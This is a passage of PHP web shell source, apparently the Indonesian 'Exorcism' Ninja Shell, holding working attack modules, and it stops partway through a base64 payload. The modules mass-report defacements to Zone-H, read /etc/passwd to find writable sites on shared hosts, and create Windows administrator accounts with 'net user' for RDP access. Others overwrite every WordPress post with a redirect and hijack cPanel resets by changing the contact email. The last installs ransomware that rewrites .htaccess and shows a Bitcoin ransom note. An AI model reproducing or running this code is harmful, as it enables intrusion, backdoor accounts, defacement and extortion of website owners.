<input type="text" name="defacer" style="width: 250px; height: 30px;" value="Your Zone-h Name" class="form-control" />
<br>
<u>Attacks Method :</u>
<select name="hackmode" class="form-control" style="width: 250px; height: 40px;">
<option>--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2">undisclosed (new) vulnerability</option>
<option value="3">configuration / admin. mistake</option>
<option value="4">brute force attack</option>
<option value="5">social engineering</option>
<option value="6">Web Server intrusion</option>
<option value="7">Web Server external module intrusion</option>
<option value="8">Mail Server intrusion</option>
<option value="9">FTP Server intrusion</option>
<option value="10">SSH Server intrusion</option>
<option value="11">Telnet Server intrusion</option>
<option value="12">RPC Server intrusion</option>
<option value="13">Shares misconfiguration</option>
<option value="14">Other Server intrusion</option>
<option value="15">SQL Injection</option>
<option value="16">URL Poisoning</option>
<option value="17">File Inclusion</option>
<option value="18">Other Web Application bug</option>
<option value="19">Remote administrative panel access bruteforcing</option>
<option value="20">Remote administrative panel access password guessing</option>
<option value="21">Remote administrative panel access social engineering</option>
<option value="22">Attack against administrator(password stealing/sniffing)</option>
<option value="23">Access credentials through Man In the Middle attack</option>
<option value="24">Remote service password guessing</option>
<option value="25">Remote service password bruteforce</option>
<option value="26">Rerouting after attacking the Firewall</option>
<option value="27">Rerouting after attacking the Router</option>
<option value="28">DNS attack through social engineering</option>
<option value="29">DNS attack through cache poisoning</option>
<option value="30">Not available</option>
</select>
<br>
<u>Reasons :</u>
<select name="reason" class="form-control" style="width: 250px; height: 40px;">
<option style='display:block;width:100%;'>--------SELECT--------</option>
<option value="1">Heh...just for fun!</option>
<option value="2">Revenge against that website</option>
<option value="3">Political reasons</option>
<option value="4">As a challenge</option>
<option value="5">I just want to be the best defacer</option>
<option value="6">Patriotism</option>
<option value="7">Not available</option>
</select>
<br>
<textarea class="form-control" name="domain" style='display:block;width:25%;height:150px;'>List Of Domains</textarea>
<p>(1 Domain Per Lines)</p>
<input type="submit" class="form-control" style="width: 250px; height: 40px;" value="Send Now !" name="SendNowToZoneH" />
</form>
</center>
<hr><br><span style="color:red">
<?php function ZoneH($url, $hacker, $hackmode, $reson, $site) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k, CURLOPT_POST, true); curl_setopt($k, CURLOPT_POSTFIELDS, "defacer=" . $hacker . "&domain1=" . $site . "&hackmode=" . $hackmode . "&reason=" . $reson); curl_setopt($k, CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } if (isset($_POST["SendNowToZoneH"])) { ob_start(); $sub = @get_loaded_extensions(); if (!in_array("curl", $sub)) { die("[-] Curl Is Not Supported !! "); } $hacker = $_POST["defacer"]; $method = $_POST["hackmode"]; $neden = $_POST["reason"]; $site = $_POST["domain"]; if ($hacker == "Your Zone-h Name") { die("[-] You Must Fill the Attacker name !"); } elseif ($method == "--------SELECT--------") { die("[-] You Must Select The Method !"); } elseif ($neden == "--------SELECT--------") { die("[-] You Must Select The Reason"); } elseif (empty($site)) { die("[-] You Must Inter the Sites List ! "); } $i = 0; $sites = explode("\xa", $site); while ($i < count($sites)) { if (substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://" . $sites[$i]; } ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : " . $sites[$i] . " Defaced !<br>"; ++$i; } echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!"; } ?>
</span>
<?php } elseif (isset($_GET[hex("defacer-id")])) { echo "<hr><br><center>
\x9<h2>Defacer ID Submit Ninja Shell</h2>\xa <form method='post'>\xa\x9\x9<u>Defacer</u>: <br>
<input class = 'form-control' style='width:250px; height:40px;' type='text' name='hekel' size='50' value='./Exorcism1337'><br>
\x9 <u>Team</u>: <br>
\x9<input class = 'form-control' style='width:250px; height:40px;' type='text' name='tim' size='50' value='Index Attacker'><br>
<u>Domains</u>: <br>\xa\x9 <textarea class = 'form-control' style='width: 450px; height: 150px;' name='sites'></textarea><br>\xa\x9 <input class = 'form-control' style='width:250px; height:40px; 'type='submit' name='go' value='Submit'>\xa </form><hr><br>"; $site = explode("
", $_POST["sites"]); $go = $_POST["go"]; $hekel = $_POST["hekel"]; $tim = $_POST["tim"]; if ($go) { foreach ($site as $sites) { $zh = $sites; $form_url = "https://www.defacer.id/notify"; $data_to_post = array(); $data_to_post["attacker"] = "{$hekel}"; $data_to_post["team"] = "{$tim}"; $data_to_post["poc"] = "SQL Injection"; $data_to_post["url"] = "{$zh}"; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $form_url); curl_setopt($curl, CURLOPT_POST, sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, "https://defacer.id/notify.html"); $result = curl_exec($curl); echo $result; curl_close($curl); echo "<br>"; } } } elseif (isset($_GET[hex("jumping")])) { echo "<hr><br><center><h2>Jumping Ninja Shell</h2>"; echo "<form method = 'POST' action = ''>"; echo "<input type = 'submit' name = 'jump' class='form-control' style='width:250px;height:40px;' value = 'Jump!'> "; echo "<hr><br></center>"; if (isset($_POST["jump"])) { $i = 0; echo "<pre><div class='margin: 5px auto;'>"; $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all("/(.*?):x:/", $passwd, $user_jumping); foreach ($user_jumping[1] as $user_Exc_jump) { $user_jumping_dir = "/home/{$user_Exc_jump}/public_html"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir={$user_jumping_dir}'><font color=gold>{$user_jumping_dir}</font></a>"; if (is_writable($user_jumping_dir)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir={$user_jumping_dir}'><font color=gold>{$user_jumping_dir}</font></a>"; } echo $jrw; if (function_exists("posix_getpwuid")) { $domain_jump = file_get_contents("/etc/named.conf"); if ($domain_jump == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/{$dj}")); $user_jumping_url = $user_jumping_url["name"]; if ($user_jumping_url == $user_Exc_jump) { echo " => ( <u>{$dj}</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . gethostbyname($_SERVER["HTTP_HOST"]) . ''; } echo "</div></pre>"; } } elseif (isset($_GET[hex("fake-root")])) { ob_start(); if (!preg_match("#/home/{$user}/public_html#", $_SERVER["DOCUMENT_ROOT"])) { die("I Think this server is not using shared host "); } function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress={$url}&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[", '', str_replace("]", '', str_replace("""", '', str_replace(", ,", ",", str_replace("{", '', str_replace("{", '', str_replace("}", '', str_replace(", ", ",", str_replace(", ", ",", str_replace("'", '', str_replace("'", '', str_replace(":", ",", str_replace(""", '', $resp))))))))))))); $array = explode(",,", $resp); unset($array[0]); foreach ($array as $lnk) { $lnk = "http://{$lnk}"; $lnk = str_replace(",", '', $lnk); echo $lnk . "\xa"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if ($_POST["reverse"]) { $site = explode("
\xa", $_POST["url"]); $file = $_POST["file"]; foreach ($site as $url) { $cek = cek("{$url}/~{$user}/{$file}"); if (preg_match("/hacked/i", $cek)) { echo "URL: <a href='{$url}/~{$user}/{$file}' target='_blank'>{$url}/~{$user}/{$file}</a> -> <font color=lime>Fake Root!</font><br>"; } } } else { echo "<hr><br><center><h2>Fake Root Ninja Shell</h2><form method='post'>
Filename: <br><input class='form-control' type='text' name='file' value='deface.html' style='width:300px;height:40px;'><br>\xa\x9 User: <br><input class='form-control' type='text' value='{$user}' size='50' height='10' readonly style='width:300px;height:40px;'><br>
\x9Domain: <br>\xa <textarea class='form-control' style='width: 450px; height: 250px;' name='url'>"; reverse($_SERVER["HTTP_HOST"]); echo "</textarea><br>\xa\x9\x9<input class='form-control' type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
\x9\x9</form><br>\xa\x9 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center><hr><br>"; } } elseif (isset($_GET[hex("adminer")])) { echo "<hr><br>"; echo "<center><h2>Adminer Ninja Shell</h2>"; echo "<input type='submit' class='form-control' value='Spawn Adminer' style='width:250px;height:40px;' name='do_adminer'></center>"; echo "<hr><br>"; if (isset($_POST["do_adminer"])) { $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("adminer.php")) { echo "<center><font color=lime><a href='{$full}/adminer.php' target='_blank'>-> adminer login <-</a></font></center>"; } else { if (adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php", "adminer.php")) { echo "<center><font color=lime><a href='{$full}/adminer.php' target='_blank'>-> adminer login <-</a></font></center>"; } else { echo "<center><font color=red>gagal buat file adminer</font></center>"; } } } } elseif (isset($_GET[hex("rdp")])) { if (strtolower(substr(PHP_OS, 0, 3)) === "win") { if ($_POST["create"]) { $user = htmlspecialchars($_POST["user"]); $pass = htmlspecialchars($_POST["pass"]); if (preg_match("/{$user}/", exe("net user"))) { echo "[INFO] -> <font color=red>user <font color=lime>{$user}</font> sudah ada</font>"; } else { $add_user = exe("net user {$user} {$pass} /add"); $add_groups1 = exe("net localgroup Administrators {$user} /add"); $add_groups2 = exe("net localgroup Administrator {$user} /add"); $add_groups3 = exe("net localgroup Administrateur {$user} /add"); echo "[ RDP ACCOUNT INFO ]<br>
------------------------------<br>
IP: <font color=lime>" . gethostbyname($_SERVER["HTTP_HOST"]) . "</font><br>\xa Username: <font color=lime>{$user}</font><br>\xa Password: <font color=lime>{$pass}</font><br>
------------------------------<br><br>\xa [ STATUS ]<br>\xa ------------------------------<br>\xa "; if ($add_user) { echo "[add user] -> <font color='lime'>Berhasil</font><br>"; } else { echo "[add user] -> <font color='red'>Gagal</font><br>"; } if ($add_groups1) { echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>"; } elseif ($add_groups2) { echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>"; } elseif ($add_groups3) { echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>"; } else { echo "[add localgroup] -> <font color='red'>Gagal</font><br>"; } echo "------------------------------<br>"; } } elseif ($_POST["s_opsi"]) { $user = htmlspecialchars($_POST["r_user"]); if ($_POST["opsi"] == "1") { $cek = exe("net user {$user}"); echo "Checking username <font color=lime>{$user}</font> ....... "; if (preg_match("/{$user}/", $cek)) { echo "[ <font color=lime>Sudah ada</font> ]<br>
------------------------------<br><br>\xa <pre>{$cek}</pre>"; } else { echo "[ <font color=red>belum ada</font> ]"; } } elseif ($_POST["opsi"] == "2") { $cek = exe("net user {$user} Exorcism1337"); if (preg_match("/{$user}/", exe("net user"))) { echo "[change password: <font color=lime>Exorcism1337</font>] -> "; if ($cek) { echo "<font color=lime>Berhasil</font>"; } else { echo "<font color=red>Gagal</font>"; } } else { echo "[INFO] -> <font color=red>user <font color=lime>{$user}</font> belum ada</font>"; } } elseif ($_POST["opsi"] == "3") { $cek = exe("net user {$user} /DELETE"); if (preg_match("/{$user}/", exe("net user"))) { echo "[remove user: <font color=lime>{$user}</font>] -> "; if ($cek) { echo "<font color=lime>Berhasil</font>"; } else { echo "<font color=red>Gagal</font>"; } } else { echo "[INFO] -> <font color=red>user <font color=lime>{$user}</font> belum ada</font>"; } } else { } } else { echo "<hr><br><center>"; echo "<h2>RDP Ninja Shell</h2>"; echo "-- Create RDP --<br>\xa <form method='post'>
<div class = 'row clearfix'>
<div class = 'col-md-4'>\xa <u>Username:</u>\xa <input class ='form-control' style = 'width:250px;height:40px;' type='text' name='user' placeholder='username' value='Exorcism1337' required>
</div>
<div class = 'col-md-4'>\xa <u>Password:</u>\xa <input class ='form-control' style = 'width:250px;height:40px;' type='text' name='pass' placeholder='password' value='Exorcism1337' required>\xa </div>\xa <div class = 'col-md-4'>
<u>Button:</u>\xa <input class ='form-control' style = 'width:250px;height:40px;' type='submit' name='create' value='Gass'>\xa </div>\xa </div>\xa </form><br>\xa -- Option --<br>
<form method='post'>\xa <div class = 'row clearfix'>\xa <div class = 'col-md-4'>\xa <input class ='form-control' style = 'width:250px;height:40px;' type='text' name='r_user' placeholder='username' required>
</div>
<div class = 'col-md-4'>\xa <select name='opsi' class ='form-control' style = 'width:250px;height:40px;'>
<option value='1'>Cek Username</option>
<option value='2'>Ubah Password</option>\xa <option value='3'>Hapus Username</option>
</select>\xa </div>
<div class = 'col-md-4'>
<input type='submit' name='s_opsi' value='Cek' class ='form-control' style = 'width:250px;height:40px;'>\xa </div>
</div>\xa </form><hr><br>
"; } } else { echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>"; } } elseif (isset($_GET[hex("wp-hijack")])) { echo "<form method="POST">
<center><hr><br> \x9
<img border="0" src="http://www3.0zz0.com/2014/08/20/15/615506358.png">
<h2>Wordpress Hijack Index Ninja Shell</h2><br>
<center>
<div class = "row clearfix ml-5">\xa<div class= "col-md-2">
<input class="form-control" type="text" value="localhost" name="pghost">\xa</div>\xa<div class= "col-md-2">\xa<input class="form-control" type="text" value="database_name" name="dbnmn">\xa</div>\xa<div class= "col-md-2">\xa<input class="form-control" type="text" value="prefix" name="prefix">
</div>\xa<div class= "col-md-2">
<input class="form-control" type="text" value="username_db" name="dbusrrrr">
</div>\xa<div class= "col-md-2">\xa<input class="form-control" type="text" value="password_db" name="pwddbbn"></center><br>\xa</div>\xa</div>\xa<center><textarea class="form-control" name="pown" cols="85" rows="10"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw.php?i=WG1zASMG"></textarea><br>
<input style="width:250px;height:40px;" class="form-control" type="submit" name="up2" value="Hijack Index"><br></center><form><hr><br>"; $pghost = $_POST["pghost"]; $dbnmn = $_POST["dbnmn"]; $dbusrrrr = $_POST["dbusrrrr"]; $pwddbbn = $_POST["pwddbbn"]; $index = stripslashes($_POST["pown"]); $prefix = $_POST["prefix"]; if ($_POST["up2"]) { @mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error()); @mysql_select_db($dbnmn) or die(mysql_error()); $tableName = $prefix . "posts"; $ghost1 = mysql_query("UPDATE {$tableName} SET post_title ='" . $index . "' WHERE ID > 0 "); if (!$ghost1) { $ghost2 = mysql_query("UPDATE {$tableName} SET post_content ='" . $index . "' WHERE ID > 0 "); } elseif (!$ghost2) { $ghost3 = mysql_query("UPDATE {$tableName} SET post_name ='" . $index . "' WHERE ID > 0 "); } mysql_close(); if ($ghost1 || $ghost2 || $ghost3) { echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>"; } else { echo "<center><p><b><font color='red'>Failed To Hijack the Website :(</font></p></b></center>"; } } } elseif (isset($_GET[hex("cpanel-reset")])) { echo "\xa \x9<hr><br>
<center>\xa <h2>Cpanel Reset Ninja Shell</h2>\xa <br><br>
\xa \xa \x9 <form action="" method="post">\xa <b> Email : </b>
<input type="email" name="email" class = "form-control" style = "width:250px; height:40px;" autocomplete="off" />\xa \x9<br>\xa <input type="submit" name="submit" value="Reset Password!" class = "form-control" style = "width:250px; height:40px;" />\xa </form>\xa \x9<br>\xa </div>
</center>\xa <hr><br>
"; $user = get_current_user(); $site = $_SERVER["HTTP_HOST"]; $ips = getenv("REMOTE_ADDR"); if (isset($_POST["submit"])) { $email = $_POST["email"]; $wr = "email:" . $email; $f = fopen("/home/" . $user . "/.cpanel/contactinfo", "w"); fwrite($f, $wr); fclose($f); $f = fopen("/home/" . $user . "/.contactinfo", "w"); fwrite($f, $wr); fclose($f); $parm = "Disini : " . $site . ":2083/resetpass?start=1"; echo "<br/><center>" . $parm . "</center>"; } } elseif (isset($_GET[hex("zip-menu")])) { $dir = path(); echo "<center>"; echo "<hr><br>"; echo "<h2>Zip Menu</h2>"; function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("." === $file || ".." === $file) { continue; } if (is_dir("{$dir}/{$file}")) { rmdir_recursive("{$dir}/{$file}"); } else { unlink("{$dir}/{$file}"); } } rmdir($dir); } if ($_FILES["zip_file"]["name"]) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array("application/zip", "application/x-zip-compressed", "multipart/x-zip", "application/x-compressed"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "zip" ? true : false; if (!$continue) { $message = "Itu Bukan Zip , , GOBLOK COK"; } $path = dirname(__FILE__) . "/"; $filenoext = basename($filename, ".zip"); $filenoext = basename($filenoext, ".ZIP"); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } mkdir($targetdir, 511); if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "<b>Sukses Cok :)</b>"; } else { $message = "<b>Error Jancok :(</b>"; } } echo "<table style="width:100%" border="1">\xa<form enctype="multipart/form-data" method="post" action="">\xa<label>Zip File : <input type="file" class="form-control" name="zip_file" /></label>
<input type="submit" class="form-control" style="width:250px;" name="submit" value="Upload And Unzip" />
</form><br><br>"; if ($message) { echo "<p>{$message}</p>"; } echo "<h2>Zip Backup</h2>
<form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br>
<input class='form-control' type='text' name='dir' value='{$dir}' style='width: 450px;' height='10'><br><br>\xa<font style='text-decoration: underline;'>Save To:</font><br>\xa<input class='form-control' type='text' name='save' value='{$dir}/Exorcism_backup.zip' style='width: 450px;' height='10'><br><br>\xa<input class='form-control' type='submit' name='backup' class='kotak' value='Back Up!' style='width: 215px;'></form><br><br>"; if ($_POST["backup"]) { $save = $_POST["save"]; function Zip($source, $destination) { if (extension_loaded("zip") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "/", '', $file . "/")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "/", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["dir"], $save); echo "Selesai , Save To <b>{$save}</b>"; } echo "\xa <h2>Unzip Manual</h2>
<form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br>\xa <input class='form-control' type='text' name='dir' value='{$dir}/file.zip' style='width: 450px;' height='10'><br><br>\xa <font style='text-decoration: underline;'>Save To:</font><br>
<input class='form-control' type='text' name='save' value='{$dir}/Exorcism_unzip' style='width: 450px;' height='10'><br><br>\xa <input class='form-control' type='submit' name='extrak' class='kotak' value='Unzip!' style='width: 215px;'></form><br><br>\xa "; if ($_POST["extrak"]) { $save = $_POST["save"]; $zip = new ZipArchive(); $res = $zip->open($_POST["dir"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo "Succes , Location : <b>" . $save . "</b>"; } else { echo "Gagal Cok :( Ntahlah !"; } } echo "</table><hr>"; } elseif (isset($_GET[hex("reverse-ip")])) { ?>
<br>
<hr>
<center>
<h2>Reverse IP Ninja Shell</h2>
<a style="width: 250px;" class="form-control" onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER["SERVER_ADDR"]; ?>
','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER["SERVER_ADDR"]; ?>
">[ Reverse IP Lookup ] </a>
</center>
<br>
<hr>
<?php } elseif (isset($_GET[hex("ransomware")])) { if (version_compare(PHP_VERSION, "7.2.0", ">")) { echo "<br><br><font color = red>Tools Ransomware Ini Hanya bisa berjalan di PHP versi 7.2 ke bawah saja . untuk PHP versi 7.2 ke atas masih proses pembuatan </font> "; die; } ?>
<br>
<hr>
<html>
<head>
<link rel="icon" type="image/gif" href="https://s-media-cache-ak0.pinimg.com/236x/a7/76/ec/a776ec52e575d0473d33557aa610e47d--skull-fashion-flower-tattoos.jpg">
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<title> ҳ̸Ҳ̸ҳ Exorcism Tr0jan Ransomware ҳ̸Ҳ̸ҳ</title>
<style type="text/css">
.inpute {
width: 500px;
height: 20px;
border-color: #EA2A14;
color: lime;
text-align: center;
}
.selecte {
border-color: lime;
width: 300px;
height: 30px;
background-color: transparent;
color: lime;
}
.submite {
width: 200px;
border-color: #EA2A14;
background-color: transparent;
color: red;
}
.item {
background-color: black;
}
</style>
</head>
<body>
<?php error_reporting(0); set_time_limit(0); ini_set("memory_limit", "-1"); class deRanSomeware { public function shcpackInstall() { if (!file_exists(".htaencrypted")) { rename(".htaccess", ".htaencrypted"); if (fwrite(fopen(".htaccess", "w"), "#Exorcism Ransomware\xd
DirectoryIndex virus.php\xd
ErrorDocument 404 /virus.php")) { echo "<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>"; } if (file_put_contents("virus.php", base64_decode("PGh0bWw+DQo8Ym9keT4NCjxoZWFkPg0KDQo8dGl0bGU+RW5jcnlwdGVkITwvdGl0bGU+DQoNCjwvaGVhZD4NCjxsaW5rIHJlbD0iaWNvbiIgdHlwZT0iaW1hZ2UvZ2lmIiBocmVmPSJodHRwczovL3MtbWVkaWEtY2FjaGUtYWswLnBpbmltZy5jb20vMjM2eC9hNy83Ni9lYy9hNzc2ZWM1MmU1NzVkMDQ3M2QzMzU1N2FhNjEwZTQ3ZC0tc2t1bGwtZmFzaGlvbi1mbG93ZXItdGF0dG9vcy5qcGciPg0KPGJvZHkgYmdjb2xvciA9ICdibGFjayc+DQo8Y2VudGVyPg0KDQo8c3R5bGUgdHlwZT0ndGV4dC9jc3MnPmJvZHksIGEsIGE6bGlua3tjdXJzb3I6dXJsKGh0dHA6Ly80LmJwLmJsb2dzcG90LmNvbS8taEFGN3RQVW5tRUUvVHdHUjNsUkgwRUkvQUFBQUFBQUFBczgvNnBraTIyaGMzTkUvczE2MDAvYXNzLnBuZyksIGRlZmF1bHQ7fSBhOmhvdmVyIHtjdXJzb3I6dXJsKGh0dHA6Ly8zLmJwLmJsb2dzcG90LmNvbS8tYlJpa2dxZVp4MFEvVHdHUjRNVUVDN0kvQUFBQUFBQUFBdEEvaXNKbVMwcjM1UXcvczE2MDAvcG9pbnRlci5wbmcpLHdhaXQ7fTwvc3R5bGU+DQo8cHJlIHN0eWxlPSJmb250OiAxMnB4LzEycHggbW9ub3NwYWNlOyI+PGZvbnQgY29sb3IgPSAncmVkJz4NCnV1dXV1dXUNCnV1JCQkJCQkJCQkJCR1dQ0KdXUkJCQkJCQkJCQkJCQkJCQkJHV1DQp1JCQkJCQkJCQkJCQkJCQkJCQkJCQkdQ0KdSQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkdQ0KdSQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCR1DQp1JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJHUNCnUkJCQkJCQiICAgIiQkJCIgICAiJCQkJCQkdQ0KIiQkJCQiICAgICAgdSR1ICAgICAgICQkJCQiDQokJCR1ICAgICAgIHUkdSAgICAgICB1JCQkDQokJCR1ICAgICAgdSQkJHUgICAgICB1JCQkDQoiJCQkJHV1JCQkICAgJCQkdXUkJCQkIg0KIiQkJCQkJCQiICAgIiQkJCQkJCQiDQp1JCQkJCQkJHUkJCQkJCQkdQ0KdSQiJCIkIiQiJCIkIiR1DQp1dXUgICAgICAgICQkdSQgJCAkICQgJHUkJCAgICAgICB1dXUNCnUkJCQkICAgICAgICAkJCQkJHUkdSR1JCQkICAgICAgIHUkJCQkDQogJCQkJCR1dSAgICAgICIkJCQkJCQkJCQiICAgICB1dSQkJCQkJA0KIHUkJCQkJCQkJCQkJHV1ICAgICIiIiIiICAgIHV1dXUkJCQkJCQkJCQkDQogICAkJCQkIiIiJCQkJCQkJCQkJHV1dSAgIHV1JCQkJCQkJCQkIiIiJCQkIg0KIiIiICAgICAgIiIkJCQkJCQkJCQkJHV1ICIiJCIiIiAgICAgDQogICAgdXV1dSAiIiQkJCQkJCQkJCR1dXUNCiAgICB1JCQkdXV1JCQkJCQkJCQkdXUgIiIkJCQkJCQkJCQkJHV1dSQkJA0KICAgICAkJCQkJCQkJCQkIiIiIiAgICAgICAgICAgIiIkJCQkJCQkJCQkJCINCiAgICAgICIkJCQkJCIgICAgICAgICAgICAgICAgICAgICAgIiIkJCQkIiINCiAgICAgICAkJCQiICAgICAgICAgICAgICAgICAgICAgICAgICQkJCQiDQo8L3ByZT48L2ZvbnQ+DQo8bGluayBocmVmPSdodHRwOi8vZm9udHMuZ29vZ2xlYXBpcy5jb20vY3NzP2ZhbWlseT1JY2VsYW5kJyByZWw9J3N0eWxlc2hlZXQnIHR5cGU9J3RleHQvY3NzJz4NCjxmb250IGZhY2U9ImljZWxhbmQiIHNpemU9IjEwIiBjb2xvciA9ICdyZWQnPllvdXIgV2Vic2l0ZSBIYXZlIEJlZW4gRW5jcnlwdGVkISA8YnI+DQo8Zm9udCBzaXplID0gJzYnPkJ5IDxicj5FeG9yY2lzbSAmIFNlY3VyaXR5X0h1bnRlcno8L2ZvbnQ+PGJyPjwvZm9udD48YnI+DQo8Zm9udCBmYWNlID0gJ2ljZWxhbmQnIHNpemUgPSAnNicgY29sb3IgPSAnd2hpdGUnPldoYXQgSGFwcGVuZWQgVG8gWW91ciBXZWJzaXRlPyANCgkJPGJyPjxicj4gDQoJCTxmb250IHNpemU9JzUnIGNvbG9yID0gJ3JlZCc+WW91ciBpbXBvcnRhbnQgd2Vic2l0ZSBmaWxlcyBhcmUgZW5jcnlwdGVkLjxicj4NCgkJPGZvbnQgY29sb3I9J3doaXRlJz4NCgkJTWFueSBvZiB5b3VyIC5waHAsIC5jc3MsIC5qcywgYW5kIG90aGVyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJlbA0KCQliZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gPGJyPk1heWJlIHlvdSBhcmUgYnVzeSBsb29raW5nIGZvciBhIHdheSB0byANCgkJcmVjb3ZlciB5b3VyIGZpbGVzLDxicj4gYnV0IGRvIG5vdCB3YXN0ZSB5b3VyIHRpbWUhPGJyPiBOb2JvZHkgY2FuIGRlY3J5cHQgeW91ciBmaWxlcw0KCQl3aXRob3V0IG91ciBzcGVjaWFsIGRlY3J5cHRpb24gc2VydmljZS4gPGJyPg0KDQoJCTxmb250IENvbG9yID0gJ3JlZCc+RG8gTm90IFRyeSBUbyBEZWNyeXB0IEJ5IFlvdXIgU2VsZiwgT3IgWW91ciBGaWxlcyBXaWxsIEJlIERlbGV0ZWQgQXV0b21hdGljYWxseS4gPGJyPjxicj4NCgkJCTxmb250IGNvbG9yID0nd2hpdGUnIHNpemU9IjYiPiBIb3cgdG8gcmVjb3ZlciB5b3VyIHdlYnNpdGU/IDxicj48Zm9udCBzaXplID0gJzUnPg0KCQkJU3VyZSwgd2UgZ3VhcmFudGVlIHRoYXQgeW91IGNhbiByZWNvdmVyIGFsbCB5b3VyIGZpbGVzIHNhZmVseSBhbmQgZWFzaWx5LiBCdXQgeW91IGhhdmUgbm90IGVub3VnaCB0aW1lLjxicj4NCgkJCXdlIGNhbiBkZWNyeXB0IGFsbCB5b3VyIHdlYnNpdGUgZmlsZSBzYWZlbHksIGhvdyA/IFlvdSBNdXN0IFBheSBpdCB3aXRoPGZvbnQgY29sb3I9InJlZCI+IDEyMCRCaXRjb2luPC9mb250Pjxicj4NCgkJCUlmIHlvdSBuZWVkIG91ciBhc3Npc3RhbmNlLCBZb3UgY2FuIGNvbnRhY3QgdXMgdmlhIGVtYWlsOi1bRXhvcmNpc200MDRAaGFja2VybWFpbC5jb21dLSA8YnI+PGJyPg0KCQkJQWZ0ZXIgWW91IFBh